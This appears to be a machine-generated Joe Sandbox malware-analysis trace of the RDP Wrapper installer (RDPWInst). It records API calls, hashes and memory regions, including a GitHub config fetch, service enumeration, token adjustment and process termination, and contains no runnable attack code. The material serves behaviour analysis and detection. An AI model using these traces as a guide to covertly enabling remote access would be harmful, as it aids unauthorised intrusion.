                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn
                                                    • String ID:
                                                    • API String ID: 97706510-0
                                                    • Opcode ID: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                    • Instruction ID: 1f383253a52e48d77bc15eb4822a33d834d352bf49a326ca98ed7cc47a11fc89
                                                    • Opcode Fuzzy Hash: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                    • Instruction Fuzzy Hash: 0111C671504204EFDF21DB69CC86B9A77F8EB19754F5100BAFC40AB2D2D7B8AD008A19
                                                    APIs
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402AE3
                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00402B06
                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00402B13
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Virtual$Free$Query
                                                    • String ID:
                                                    • API String ID: 778034434-0
                                                    • Opcode ID: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                    • Instruction ID: e8ddcf902efd7f78c833b1da2340b8221ccc6e4d64c13544335dcfda98f803ee
                                                    • Opcode Fuzzy Hash: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                    • Instruction Fuzzy Hash: 0CF06D343046005FD311CB19CA89B17BBE5EFC9350F15C17AE988973E5E675DC019B9A
                                                    APIs
                                                    • InternetOpenW.WININET(RDP Wrapper Update,00000000,00000000,00000000,00000000), ref: 0043CF9B
                                                    • InternetOpenUrlW.WININET(00000000,https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini,00000000,00000000,80000000,00000000), ref: 0043CFB7
                                                    • InternetCloseHandle.WININET(00000000), ref: 0043CFC3
                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0043CFDB
                                                    • InternetCloseHandle.WININET(00000000), ref: 0043D002
                                                    • InternetCloseHandle.WININET(00000000), ref: 0043D008
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandle$Open$FileRead
                                                    • String ID: $sD$RDP Wrapper Update$https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                                                    • API String ID: 4294395943-3115740878
                                                    • Opcode ID: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                    • Instruction ID: c5d90ac50beae541ecf0d1101a3828864360ef58c633fc88e2a86ac238cf1af1
                                                    • Opcode Fuzzy Hash: 0dd60196e7cab0bfb1fb3172ef56b337b41d75a0cde3163acb5471a059a842a1
                                                    • Instruction Fuzzy Hash: B611EC30A40204BAE725DB629C52F5E73B99B5CB08F21907AF500B61C1DAFC6D15965E
                                                    APIs
                                                    • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E8B
                                                    • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408E9E
                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EB4
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 00408EC0
                                                    • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 00408EFC
                                                    • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00408F08
                                                    • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00408F2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$Findlstrlen$CloseFileFirst
                                                    • String ID: \
                                                    • API String ID: 426534248-2967466578
                                                    • Opcode ID: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                    • Instruction ID: b362d454dc0c99aa6135db0f351dbab6b5904c2f5f97e8c1ae29e40b3cae7ae2
                                                    • Opcode Fuzzy Hash: c2c22b4f6afaac3322ec1ba7b89a81b7c1940998765c8b0d5641ec05d20bdfa1
                                                    • Instruction Fuzzy Hash: 2921DA72A005195BCB10EAA4CD89BEF736DEB84314F0845BBA554E32C1EA7CEA458B58
                                                    APIs
                                                    • IsValidLocale.KERNEL32(?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089B4
                                                    • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089D0
                                                    • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,00408A6F,?,?,?,00000000), ref: 004089E1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Locale$Info$Valid
                                                    • String ID:
                                                    • API String ID: 1826331170-0
                                                    • Opcode ID: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                    • Instruction ID: a5145651339b4fb3455c536bf826b1f6d015bb6bedb64d7d22cca76e959b3329
                                                    • Opcode Fuzzy Hash: 22c6a01b53f4869b0805d6a69e827c795f3fdd97ab41ae37c19bcf7436934d77
                                                    • Instruction Fuzzy Hash: 4031C274A00618ABDF20EB55DD81BAF77B5EB44700F1040BBA588B72D1DA7D5E40CF5A
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?,00443136,00000000,0044315A), ref: 004146A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Version
                                                    • String ID: 8[D
                                                    • API String ID: 1889659487-4257705004
                                                    • Opcode ID: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                    • Instruction ID: 2f0940f951a798b0a8c1b92e6229d48fd5c0b6d32f60b1d075f360ba34157daa
                                                    • Opcode Fuzzy Hash: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                    • Instruction Fuzzy Hash: 7DF030B8605B419FDB00DF18E845659B7E0EB89314F00483AF485D7391D738A844CB6E
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000), ref: 0040F757
                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000), ref: 0040F762
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                    • Instruction ID: 44d6f2536772e544dca19d4554f13a915e571bc99722c0a0b507a91726501656
                                                    • Opcode Fuzzy Hash: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                    • Instruction Fuzzy Hash: B9E0CD6261470815C72065B90CC9B5B728C5B04328F040BB77D5CF35D2FA3D8554115F
                                                    APIs
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0040FB09
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1705453755-0
                                                    • Opcode ID: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                    • Instruction ID: 58712635a06311b99fbeb36610203dfa2cb34c225fc8d295b9fe620e031658d4
                                                    • Opcode Fuzzy Hash: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                    • Instruction Fuzzy Hash: DC1112B5E00209AFDB04CF99C881DAFF7F9EFC8304B14C569A508E7254E6319A018B90
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                    • Instruction ID: 9da8dff9c55e20549594a614ff7d844013acaeb15ab394cddf5a90cc700bc9e0
                                                    • Opcode Fuzzy Hash: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                    • Instruction Fuzzy Hash: 69E0927170021817E314A5695C86DEB725C9B58300F00417FBA06D7387EDB89D6046ED
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                    • Instruction ID: 70141b24f99fd98ac1db3019ee377dee0462c825b9fd2fb3f3473e8324f2be5c
                                                    • Opcode Fuzzy Hash: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                    • Instruction Fuzzy Hash: 01E0DF3270031827F31495689D86EFB729C9B58300F00427BBE06D3382FDB49DA046E9
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0041524C,00000000,00415476,?,?,00000000,00000000), ref: 00412CAB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                    • Instruction ID: c0299d43d85d1b47cbbe3802d462e1d0899c6c80b318dcec9f9e75b03fa43e2d
                                                    • Opcode Fuzzy Hash: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                    • Instruction Fuzzy Hash: 17D05EB63092202AE210525B6E45DBF56DCCBC87A2F10443BBA48C6242E268CC5693F9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID:
                                                    • API String ID: 481472006-0
                                                    • Opcode ID: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                    • Instruction ID: 9e8cd4c1e66a35051b5eb1694121f13696e39ccab0ec977751e8beb904ec194d
                                                    • Opcode Fuzzy Hash: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                    • Instruction Fuzzy Hash: D1A0110080882002C2803B2A0C032383080A800A30FC80BAAB8F8A02E2EA2E023088AB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 00417D39
                                                      • Part of subcall function 00417D04: GetProcAddress.KERNEL32(00000000), ref: 00417D1D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                    • API String ID: 1646373207-1918263038
                                                    • Opcode ID: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                    • Instruction ID: c99ab9519c0edb256345e3c1c1fceae5193512a11a1c4a98270a3cb03c9355dc
                                                    • Opcode Fuzzy Hash: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                    • Instruction Fuzzy Hash: 25412575A4C2085A5305AB6EB8018FA77B9DA86324374D07FF5088B745DF7CACC2876D
                                                    APIs
                                                      • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                      • Part of subcall function 0043B7D4: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                      • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                      • Part of subcall function 0043B7D4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                      • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                      • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                      • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                      • Part of subcall function 0043BF00: GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                      • Part of subcall function 0043BF00: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                      • Part of subcall function 0043BF00: GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                      • Part of subcall function 0043C1C8: OpenProcess.KERNEL32(00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                      • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                      • Part of subcall function 0043C1C8: TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                      • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                      • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                      • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                    • Sleep.KERNEL32(000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043F9CC
                                                    • Sleep.KERNEL32(000001F4,000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043FA09
                                                      • Part of subcall function 0043B58C: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                      • Part of subcall function 0043B58C: GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
